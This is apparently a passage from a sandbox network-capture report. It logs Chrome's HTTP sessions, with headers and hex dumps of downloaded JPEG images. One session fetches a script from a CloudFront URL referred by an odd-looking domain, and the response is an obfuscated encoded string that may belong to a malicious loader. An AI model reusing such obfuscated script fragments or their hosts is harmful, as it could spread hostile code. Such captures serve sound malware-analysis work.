                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:02 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 12629
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: cee4f732-5e55-4ee5-a4c8-13ec5a87173f
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2016 20:59:51 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 08 Jun 2044 23:36:42 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:02 GMT
                                                                                                                                                                                          Age: 2822311
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200067-IAD, cache-ewr-kewr1740044-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 bd 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 00 05 06 07 08 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f9 5b 06 3d 49 64 c6 6d 19 39 8c 44 e6 31 92
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3[=Idm9D1
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: 5d d2 4b 7d e0 9e b7 f3 a7 57 16 75 7c c6 da bb 6d c9 75 15 c6 e7 bd c7 ce 6b 25 36 57 dd df a1 d8 95 6a fc d4 8d 4e cb 55 a9 ad a1 b0 d6 bb d7 ab 62 bd 55 28 72 2a 04 08 6a 89 83 0a 2e 9c 84 ad 13 6a 9b 2b 31 c8 6c e8 6d 4b 26 f6 ae 6b ae 49 b6 7b 3d 2e c6 47 77 b3 d0 6c d0 6e b8 1e b9 05 38 7e 63 a2 e7 fa 13 a2 e4 37 5c 85 39 fb 5e 8b ca 7a 65 6f 5e b3 e6 fd 2f 2f 4f 4c 34 58 bb 29 36 b1 34 a9 59 a8 ed 5e ad aa ae a8 4b 55 55 58 30 28 80 06 34 4d 3c 89 74 48 98 96 4a cd 62 4d 28 e9 5c cd ac 59 a2 f9 d3 65 b0 d2 dc 91 de de d1 dc 99 dc d7 ad 4b 0e 7f 59 b4 d7 5a 75 35 5b 60 bf 1e a6 cd a4 94 db 6c f4 36 a1 d7 d9 6e f8 6e 82 36 dc a2 b0 0c 15 19 59 c0 d6 62 1d 56 b3 5d 00 84 c5 10 06 72 89 a5 c8 ce 89 49 a8 92 cc 34 94 e8 d2 49 a3 bd f5 4e 6f 6e d6 bd f3
                                                                                                                                                                                          Data Ascii: ]K}Wu|muk%6WjNUbU(r*j.j+1lmK&kI{=.Gwln8~c7\9^zeo^//OL4X)64Y^KUUX0(4M<tHJbM(\YeKYZu5[`l6nn6YbV]rI4INon
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: af 40 61 d3 cc 79 1e 09 e4 d9 3c 3b 87 b7 c1 b1 42 b0 c6 b3 55 ea 3b 6f f6 e0 03 eb 0c 68 61 f6 62 08 b1 62 99 73 01 5b 6d b2 f4 0a 2b 6c 9d 9a cf 14 f2 f8 9d 54 b5 ab 36 fd 40 97 28 35 26 de c1 fc 69 8d 42 bb 36 e6 e1 86 1f 66 20 82 08 a6 64 7d 68 44 22 05 27 c3 1d 74 41 99 88 12 c2 02 27 d3 c8 84 26 57 89 ff 00 65 50 be 9b f0 30 c3 0f b2 10 41 04 06 6e 59 8b e7 b9 62 85 1a 13 1f d7 72 d7 e6 c4 9a 6d 05 78 1a 1b 8e c1 dc dc df 81 30 c3 0f b3 10 41 04 dc 69 61 f0 27 49 e2 1b 62 25 91 6c 9b f0 30 c3 f7 87 cc 20 82 6e 6e 31 8f e1 69 f4 1e 20 ea 6e 2b 45 78 1b 7e 27 d9 8f 00 60 33 73 70 98 de 04 6e 6b 73 8c d7 88 30 19 bf 03 ed b7 37 37 0c 6f b0 b0 4d fb 9d cd cd c6 fb 0b e1 bf 75 b9 bf b2 20 3e 1b f6 e0 16 20 0b b0 0f d4 2b c8 ab 90 ae d5 45 7a cf 9a 59 dd
                                                                                                                                                                                          Data Ascii: @ay<;BU;ohabbs[m+lT6@(5&iB6f d}hD"'tA'&WeP0AnYbrmx0Aia'Ib%l0 nn1i n+Ex~'`3spnks077oMu > +EzY
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: ec 62 9c 98 db 1e 46 90 e4 51 a8 90 91 14 24 38 8e 23 8b ef 74 a6 e2 dc 07 19 db 24 da da a5 f6 8d 5e 96 24 9f 92 d7 12 5f 16 3f 14 ca b5 69 f8 45 f9 a7 04 da b7 18 0a 03 88 e2 3f 4b f3 73 25 e8 a2 d3 1f a6 f1 4d fa 7b bb e8 ba b5 8f 58 91 c4 a8 ea 47 58 f1 26 a8 ea 5e 05 86 98 f0 5d 9d 3f d8 61 a2 30 14 4a 28 a1 a1 c0 70 34 35 35 35 35 34 34 34 3a c5 8c 58 c5 11 47 96 8a 28 d4 d4 d0 d0 d0 d0 d0 d0 d0 d4 51 28 a1 17 ed a2 8a 28 d4 a2 8a 28 af 65 f1 45 14 34 57 17 c5 7b 68 a2 b9 ff c4 00 26 11 00 03 00 02 02 02 02 02 02 03 01 00 00 00 00 00 00 01 02 03 11 12 13 10 21 04 20 05 31 14 22 30 41 51 32 ff da 00 08 01 03 01 01 08 00 d2 34 8d 23 48 d1 a3 48 d2 34 8e 27 13 8a 38 a3 48 e2 8e 28 e2 8e 08 e2 84 cd 9b 36 6f fc 3b f1 b3 67 23 62 a3 97 d3 46 8d 1a 34 6b
                                                                                                                                                                                          Data Ascii: bFQ$8#t$^$_?iE?Ks%M{XGX&^]?a0J(p45555444:XG(Q(((eE4W{h&! 1"0AQ24#HH4'8H(6o;g#bF4k
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: 2e bd 4f 7f 49 94 c9 86 0c ab 32 3c f1 5b db c3 98 2d 1f 74 34 ae 11 96 1f b2 17 34 a4 7b 13 1a 41 9a 91 5e d5 b2 d9 c4 0b b1 0c 24 0a b7 2a 5f f1 33 21 38 f9 ea fe d6 d0 99 b9 b7 d1 19 a0 ed f4 32 b0 77 b1 1f 05 b2 90 33 c6 65 19 61 ed 13 ec 3a 39 30 91 0d ae 4b 96 e9 e8 de 54 6b 6e e3 60 b6 bb c3 27 37 0c f8 a6 ef 68 b6 c3 1e 98 4c 76 a7 00 f1 3b b5 cb 8a 31 04 d7 2a 77 a7 37 7f 34 e6 8a 73 8d 49 d5 39 b4 e2 7e c9 ed fd 55 c3 e1 29 ed 33 60 0d 7a 6d fe af 80 fd 13 49 ae 8b 96 45 bb ca 80 d6 dd c6 c9 e3 69 19 0a 3b b1 76 d8 0e 92 9e d7 e1 b8 05 50 36 ee 36 09 c1 e2 72 bd 78 18 51 8b 39 30 3a 02 b8 d3 f0 74 72 39 35 6f 01 17 e3 f6 40 1d f3 32 24 1a 90 99 b3 07 50 c8 4d 05 ce 00 50 69 64 e1 8a 0e e5 cf 5e 41 7f cd 7c 4e 5f 13 7e 8b e0 fa 95 63 43 e7 82 b6
                                                                                                                                                                                          Data Ascii: .OI2<[-t44{A^$*_3!82w3ea:90KTkn`'7hLv;1*w74sI9~U)3`zmIEi;vP66rxQ90:tr95o@2$PMPid^A|N_~cC
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: c9 6d 7d 44 10 63 f4 16 89 74 a1 74 15 d2 fc 07 44 5c b8 e4 ce 2d 4e 14 f7 bc fb 1c a9 c3 d9 36 13 69 88 3f a0 df fe 1d 92 07 ee 58 3e b0 36 25 77 1b 29 ba 45 53 3f 3c 5e c2 e8 28 83 43 43 1a 1e af 49 d0 b4 42 17 50 71 f8 ce 7f 48 dc 5c 91 e8 b6 79 1c 8c e5 23 83 f2 e3 e4 66 36 d9 7b 6e 8c b5 3d d3 62 37 81 9c 2f 82 e2 b2 e3 fd 6e 88 eb 8b 6b 19 7d b0 2e 12 61 cf e4 7f b8 37 3d 8b 0f 8a fb 77 d6 51 06 31 a1 8c 7d 08 5a a1 6a b5 1b 51 2a d5 da cf c8 84 9e f1 cf cb b7 81 98 e6 e5 f2 71 c6 67 77 65 36 f9 3b b0 ca 7e 3d e8 c7 bb 8e 57 b1 18 d2 77 c2 bf c8 de 7f cd ff 00 5a d9 7c 97 8e cc 4b 0b fb 41 ed ec 2a e8 ec 63 1f 43 d1 74 2d 50 ba 0b e8 a7 df fd 12 65 81 bb 8e 3b 0b e7 2e e2 d1 8b 0f ef 22 bb 6d 92 ee ff 00 d2 fc b3 14 99 3e cf 66 bb 3f b6 5e 6a 57 b6
                                                                                                                                                                                          Data Ascii: m}DcttD\-N6i?X>6%w)ES?<^(CCIBPqH\y#f6{n=b7/nk}.a7=wQ1}ZjQ*qgwe6;~=WwZ|KA*cCt-Pe;."m>f?^jW
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: db 47 d8 84 35 48 bb 11 63 46 8f 7f 5e e9 7a 18 c9 1c 6b 66 9c 68 66 cd b7 5b dd b7 5b e8 82 d1 f4 32 f4 52 f4 26 b9 45 29 4a 52 97 a5 32 e8 a5 29 74 a2 7a d2 97 4a 5f 42 88 a5 29 4a 52 e8 ba 52 94 a5 29 4a 52 94 a5 29 4a 52 94 a5 29 4a 5d 69 74 5d 57 d5 ba 52 e9 4a 52 e9 7a 69 75 ba 52 94 a5 29 4a 52 94 a5 29 4a 5d 29 4a 52 94 a5 2e af a2 f4 5d 69 e7 7d 7c 90 b9 fd 13 e5 f4 79 bf 4c f3 3e 8e e6 05 5e c8 e2 af a1 b2 c4 fc 1e 67 d1 e2 7f 42 77 0f e8 db 25 cc e7 b7 fc 19 45 9c 22 3e df 83 cc fa 29 c3 fa 1f 61 fd 1e 67 d1 e0 7f 43 ab 7d 2f a9 44 a5 c1 36 12 ef 73 7d b9 c9 2e cc 9d b8 8f f9 fe 0a a9 de 3c 2e f7 f9 c9 6f e2 97 64 25 16 69 b2 43 46 92 af 2d 76 12 32 b8 bb f7 bd b8 39 a3 8e 38 5f 1e 45 e6 9b f7 63 db e0 7a 24 8f a7 fb c8 dc 04 5f ae 0c 1f d9 f4
                                                                                                                                                                                          Data Ascii: G5HcF^zkfhf[[2R&E)JR2)tzJ_B)JRR)JR)JR)J]it]WRJRziuR)JR)J])JR.]i}|yL>^gBw%E">)agC}/D6s}.<.od%iCF-v298_Ecz$_
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: 1e 31 a7 23 74 c1 8f 58 5e 2a eb e9 4d df 4e 39 e4 cb e3 95 78 9a 7e 4b 63 d6 7b 33 d6 59 78 97 26 78 98 c3 1f 18 c9 82 61 8f d6 30 de 1c ab ae f8 31 19 a4 98 7d a5 fa c4 11 f6 b0 ac 74 32 cd d7 e6 97 5f 84 9d f9 0e 72 cf 59 78 75 e0 79 be 06 31 dc c7 c7 21 c3 76 d4 8e f0 c1 4d 7d 07 74 b7 cf c0 c0 c9 d1 9f 11 44 dd a1 fd af 7a f8 36 bf 70 5d 20 fd 32 d0 7f 4e b7 e3 5c 66 f7 87 e0 3f ac ba ca 65 97 0c 63 1f 5c 03 4e 01 8d fc 24 ee 33 f4 cc 0a 4f 95 98 81 75 b2 67 18 dd 4d db 78 6e f1 7b 01 9f f6 cd 14 f4 f5 8d ba da 9b d8 fc 1b 38 ce b8 0e 07 78 cf 7b de 03 c8 77 8e b8 38 0f c0 98 bb b9 5e 8b f8 6e 94 ad dd e1 de b5 fc 0b 91 89 26 5d 1a bc d5 14 57 e0 bf ac 9d bd 23 eb f6 bf 66 f0 02 84 0d 11 ec 77 c0 e3 95 d1 e6 23 0f bc 91 ce 4d 33 9d ef de 18 2e 86 31
                                                                                                                                                                                          Data Ascii: 1#tX^*MN9x~Kc{3Yx&xa01}t2_rYxuy1!vM}tDz6p] 2N\f?ec\N$3OugMxn{8x{w8^n&]W#fw#M3.1
                                                                                                                                                                                          2024-12-15 11:38:02 UTC1378INData Raw: a6 f3 7a 13 d1 d1 5f 93 c4 82 eb 8f fa cb 03 51 cb c4 bc 2e 5d 72 e7 5e 07 ff 00 67 cf 09 d1 08 52 77 ef 34 db 79 24 b4 7c c7 e6 16 e3 f7 70 d8 5f f9 43 c3 98 a3 75 0e 42 9b 05 73 15 15 d0 3e 8b 49 22 3d e2 24 f4 c5 38 28 ef f3 8e 59 f6 64 31 de 98 30 61 d6 b2 5b 88 16 47 a0 2a 05 0a 78 1a 37 89 ef 1c 1d 45 53 a0 ed c0 2c 75 d6 92 42 03 83 8a b1 0a 59 4f 89 2a c1 b1 bd a5 ef d2 8f 84 e9 9d 3f 73 e3 a8 b8 ee 04 77 b7 49 90 3b e8 3e 5d f0 27 74 c0 bd bb fa b8 ca 07 de b2 c1 98 35 74 5b 20 7e d4 cb bd 0e 0b bf a5 27 65 e6 15 db 1d fd 7b 3c 2b f8 27 c9 65 31 dc dd 49 3e c1 a0 fd 76 c2 8f a4 c4 fe 54 1f f5 f8 33 fc c5 72 20 bd 29 34 19 e1 0c c2 bb 61 ab 3b 41 11 00 ae 8c d1 6a b6 0c 88 a1 87 5e a7 b0 87 98 35 6e a6 b2 4b b3 83 08 2c b1 eb d3 3d 35 cb 8c e5 e1
                                                                                                                                                                                          Data Ascii: z_Q.]r^gRw4y$|p_CuBs>I"=$8(Yd10a[G*x7ES,uBYO*?swI;>]'t5t[ ~'e{<+'e1I>vT3r )4a;Aj^5nK,=5
                                                                                                                                                                                          2024-12-15 11:38:02 UTC227INData Raw: e5 70 1e a7 ce 9f 33 89 93 4d 27 09 c0 c8 c1 81 80 fb c1 c7 ff 00 c0 df 63 22 6a f0 18 bc 93 4d 30 66 38 38 bc 4e 0e 1c 17 4d ff c4 00 24 11 00 01 03 02 04 07 00 00 00 00 00 00 00 00 00 00 00 01 31 71 10 40 11 21 60 61 20 30 32 41 50 51 70 ff da 00 08 01 02 01 09 3f 00 f1 ed 66 9f 65 c9 6c a4 ed a5 d3 7b 3f 47 56 23 13 47 7e 72 e6 c3 b8 a2 ed 59 e2 92 74 87 ff c4 00 22 11 00 02 02 01 03 04 03 00 00 00 00 00 00 00 00 00 00 01 11 31 21 10 60 61 20 30 40 51 02 32 50 ff da 00 08 01 03 01 09 3f 00 df 6f c3 f8 f8 77 b7 d9 5f 8b 66 56 dc b1 47 75 74 59 3e c7 82 7d 89 cf d9 92 4e 73 da bd 1f 23 b4 31 e2 25 f4 56 8e 1e 8f ad 8f 81 f0 3c 14 c5 a6 07 28 70 87 8b 1f 23 d9 ff 00 ff d9
                                                                                                                                                                                          Data Ascii: p3M'c"jM0f88NM$1q@!`a 02APQp?fel{?GV#G~rYt"1!`a 0@Q2P?ow_fVGutY>}Ns#1%V<(p#


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          60192.168.2.1649787108.158.71.1054436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:02 UTC875OUTGET /lMHl4TDlTFhYqBkQQHHEIAEBKfg4IXwg+XFZEHj9RUQsdOE8eGhdqU0MWFjwEdhEwOEAFSR5/CHg+IAgfRAMccRQFXxQtV1dEXilXU0RJalhUG0V4H0QJFycEWxsWKExTFQIgUhYMGXFUXwMRIFVRXEoKDB5JXX4JGA4RIl1fDgtpCwAXDGkLAEhIYgkVSj-ppCwAOESIPBFxLDhwCSQB6DRlcSnxYQAkUKU5VGxMlTRVLPnkKB1dLehwCSVAnUUQUFGkLc1xKfFVZEh1pCwAeHS9SX1BdfglTEQojVFVcSgoIAU5WfBcAV0hpCwAKGSpYQhBdfn8FSk9iCgZfDXEI HTTP/1.1
                                                                                                                                                                                          Host: d2w9cdu84xc4eq.cloudfront.net
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://arketingefifortw.com/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:03 UTC358INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Length: 746
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:02 GMT
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          Cache-Control: max-age=31556926
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 b7aa42be707be92c6f559d499f72dcc4.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                                                          X-Amz-Cf-Id: t4GOIkbx9qC1ZEdBJLpbqV7uKbgweKT_3L17QuXjO0X9wBFdplUXtw==
                                                                                                                                                                                          2024-12-15 11:38:03 UTC746INData Raw: 46 68 48 74 79 35 30 66 33 31 48 47 58 44 28 22 65 48 55 34 70 69 45 47 72 64 61 45 72 63 45 46 72 64 55 47 72 54 43 35 76 63 74 4e 68 66 6d 47 44 65 34 52 41 79 30 4a 44 66 6d 4c 76 4d 56 4b 68 4d 31 53 76 64 77 37 76 64 72 49 72 63 45 34 72 64 61 49 73 4d 74 50 42 4d 6c 38 41 37 6d 36 41 66 6d 4f 42 65 6b 4b 67 37 30 4a 73 53 45 45 76 78 4a 44 76 64 77 49 65 47 73 4b 68 7a 74 39 43 47 73 49 73 53 34 55 43 4e 6d 48 73 63 4f 53 76 63 73 4b 41 4d 50 4d 57 66 6c 49 43 47 73 49 73 53 34 51 41 4d 68 34 44 65 46 48 73 63 4f 53 66 69 46 42 66 69 46 4d 67 65 46 48 68 69 46 4d 67 65 46 48 68 69 46 32 58 69 45 45 76 63 73 53 76 63 74 4e 68 66 6d 47 44 65 34 52 41 79 30 4a 44 66 6d 4c 76 4d 56 4b 68 4d 31 53 76 63 73 53 76 78 4a 44 76 79 68 5a 42 7a 71 56 76 64 61
                                                                                                                                                                                          Data Ascii: FhHty50f31HGXD("eHU4piEGrdaErcEFrdUGrTC5vctNhfmGDe4RAy0JDfmLvMVKhM1Svdw7vdrIrcE4rdaIsMtPBMl8A7m6AfmOBekKg70JsSEEvxJDvdwIeGsKhzt9CGsIsS4UCNmHscOSvcsKAMPMWflICGsIsS4QAMh4DeFHscOSfiFBfiFMgeFHhiFMgeFHhiF2XiEEvcsSvctNhfmGDe4RAy0JDfmLvMVKhM1SvcsSvxJDvyhZBzqVvda


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          61192.168.2.1649791151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:02 UTC445OUTGET /images/M/MV5BNjZlOWE2MjUtZDZhNS00YzdkLTlkMzMtMWZmMGRlOTRiMmY3XkEyXkFqcGdeQXVyMjUyMTE3MTc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:03 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 22176
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: b2382eae-bc10-4433-9351-ba7b131d9a0d
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 03 Feb 2016 17:46:48 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 26 Nov 2044 20:43:47 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 854560
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:02 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200122-IAD, cache-nyc-kteb1890048-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a5 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 00 08 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 00 01 02 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 6b 07 d1 97 66 32 63 30 25 12 cb 13
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5kf2c0%
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 5a a7 32 4a a8 15 cc e2 f2 c9 09 36 17 88 78 2b 15 78 8b 40 18 1b 58 17 9a ac fa 04 4e 63 76 1d 29 10 f4 e8 c9 69 26 c1 73 c8 8d 94 f0 78 ec 8c ed 68 e9 43 d9 a9 73 5b 13 ea 9b fe bc 57 6d 8e 3d 1f 60 c2 b3 ad ab 2a a9 e9 2f 3d fa 17 20 7e ad d9 65 90 09 49 47 c8 be 30 61 5d 26 b7 35 ed 0f 57 f3 6b d5 cd e8 06 38 69 65 69 f7 7f 39 47 de 3d 14 d7 cc 17 6b c6 af 33 e2 c5 ed 79 ca f3 b4 e4 49 1d 7e 5c 1d 0c 46 77 6c 64 37 73 ab 23 f5 b2 cc 8d a2 9a f5 67 b5 46 c5 bb 24 1f 3c 43 fa 37 1c 6d 6b 23 6c 5b d4 1b 5f 01 da 5a 43 34 94 c4 7d 56 5f 0c b4 a2 5e 2a 1e 97 87 1a b2 4e 1a 58 e7 62 f2 e4 6b f8 4b 0f 23 a2 a2 bc b7 3b a2 ed 8c 8c 36 74 da cf 5c 90 d6 60 32 e3 3c 2f 3a 38 0e 9e 80 5b 0d 7c 6b 7b 34 14 eb 94 fb b5 08 9d 39 dc ac 96 76 fc 94 22 32 8d b8 2f 5b
                                                                                                                                                                                          Data Ascii: Z2J6x+x@XNcv)i&sxhCs[Wm=`*/= ~eIG0a]&5Wk8iei9G=k3yI~\Fwld7s#gF$<C7mk#l[_ZC4}V_^*NXbkK#;6t\`2</:8[|k{49v"2/[
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 12 77 5c 0e ee a8 6e ee 90 0b dd 21 8d dd 27 ff c4 00 30 10 00 02 02 01 03 03 04 02 01 03 04 03 01 00 00 00 01 02 00 03 11 04 12 21 10 13 31 05 20 22 41 30 32 14 23 42 51 06 15 33 61 24 34 40 43 ff da 00 08 01 01 00 01 08 02 87 f3 69 eb 67 9f c3 6f 33 d3 7f 51 2c f1 13 c0 9a 9f dd e2 f4 26 0f c5 99 9e 98 8e 31 f9 a8 50 ec 01 4a c5 79 02 b1 ce 57 d3 88 23 8b 3c 44 f1 35 3f bb 41 d0 fb 8c 33 3e d1 e2 19 78 c3 7e 51 36 ca 79 ac c0 26 8e fd 8e 23 8e 25 7f a8 9a c1 fd 43 04 30 c1 f8 47 50 30 44 cc d5 7e e7 f2 88 9b 73 3b 7b ab 24 0f 88 95 ca ce fa 94 ca bf 51 35 a3 fa 86 08 61 f1 f9 40 86 7a 8d 78 6d df 85 6b 26 76 a6 31 d0 03 2b ce 66 8e dd 98 06 fd 3e 39 0b 2b 4d 95 85 95 7e a2 6b bf e4 30 46 87 c7 b0 f4 cf 5c fb 14 c3 35 f5 ee 5d df 81 2b 81 71 31 1a 9c c5
                                                                                                                                                                                          Data Ascii: w\n!'0!1 "A02#BQ3a$4@Cigo3Q,&1PJyW#<D5?A3>x~Q6y&#%C0GP0D~s;{$Q5a@zxmk&v1+f>9+M~k0F\5]+q1
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: c8 85 70 04 53 2f 7e 22 d4 5f 38 b2 fb b6 6c 6d 35 41 91 98 f1 3d 40 62 fb 60 5c e6 18 83 27 e7 1b 7a 12 27 8f 20 46 c7 4f 3d 3c cf 30 c6 e8 dd 41 e9 9e a9 0c 3c c1 d1 63 41 c4 bb ea 77 b8 0b 1c 86 6c 8d 25 48 ea 59 cb cf 54 ff 00 d8 b2 21 c6 e8 d0 67 a5 be 72 06 4c f1 d7 ce 7a 8f 10 c3 d1 8c 13 33 33 b7 64 f9 7d ad 2e f0 e9 ac 8b 45 82 1a 1f 19 99 99 83 95 9b b9 9b b8 84 f1 2d 39 3d 16 95 ed 97 9a 6d 39 b2 b6 70 67 ab 71 62 b4 ee 64 8c 3d 6c 9f b3 3e 22 1c 30 cf de 21 6e 71 04 00 b4 ec 58 71 3b 16 0f 27 4f 64 35 b0 01 88 a9 be 85 2e dc ce d3 9e 47 6a c6 f1 fc 7b 6d e5 5d 0a 1c 36 3a 7f 35 1c 2c ee 66 17 13 7c dd 15 b1 0d 09 6c bb 42 cb ca f8 cc 33 3c 4d d9 33 f8 ee f0 68 1c f8 1a 63 db 59 a7 a7 b3 bb 76 56 7a a2 6f a6 86 82 b6 11 ac 56 5c 46 18 95 60 a1
                                                                                                                                                                                          Data Ascii: pS/~"_8lm5A=@b`\'z' FO=<0A<cAwl%HYT!grLz33d}.E-9=m9pgqbd=l>"0!nqXq;'Od5.Gj{m]6:5,f|lB3<M3hcYvVzoV\F`
